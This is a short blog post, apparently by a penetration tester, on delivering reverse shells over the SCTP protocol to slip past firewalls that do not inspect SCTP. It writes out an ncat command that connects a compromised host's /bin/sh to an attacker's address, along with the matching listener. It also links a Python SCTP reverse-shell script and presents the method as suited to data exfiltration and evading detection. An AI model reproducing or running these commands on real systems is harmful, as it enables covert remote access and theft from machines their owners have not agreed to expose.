So, over the last while I was looking at “Interesting” ways to throw back a reverse shell and remain under the radar a little bit. UDP, TCP and ICMP reverse shells have been done to death (heck, you can even use DNS tunneling), so I had the daft idea to try SCTP.
I noticed while testing it, many rubbish “Security in a box” firewalls do not actually parse SCTP packets at all, and just let them zip right through the firewall without checking their contents. So it looked like a perfect candidate for data exfiltration, spawning reverse shells, and other such mischief
Anyway, at first I tested the idea out using ncat (from nmap), which features SCTP support and basically is a full replacement for netcat.
NOTE: SCTP support should be enabled by default on Linux. If it aint, do “modprobe sctp” and see does it work then. I found that OpenVZ virtual machines tend to not have SCTP support, depending on if it is supported on the host or not.
With ncat, doing the following is enough to deliver a reverse shell over SCTP.
rootedbox:~# ncat –sctp -c /bin/sh attackerip port
attacker:~# ncat –sctp -l -v -p port
Screenshot of this:
So, we can do it with ncat, however I wanted to see how hard it would be to implement this in python.
Luckily, there is a python module for making SCTP connections – pysctp. It behaves very similarly to the socket module.
After a bit of playing around, I managed to implement a reverse shell over SCTP in python, which you can find here: http://packetstorm.igor.onlinedirect.bg/UNIX/penetration/rootkits/sctp_reverse.py.txt
Further development includes implementing SSL – it works, just tends to randomly die because pythons SSL library is rubbish, and writing these payloads in a native language (C) as opposed to python. Lots more to do here!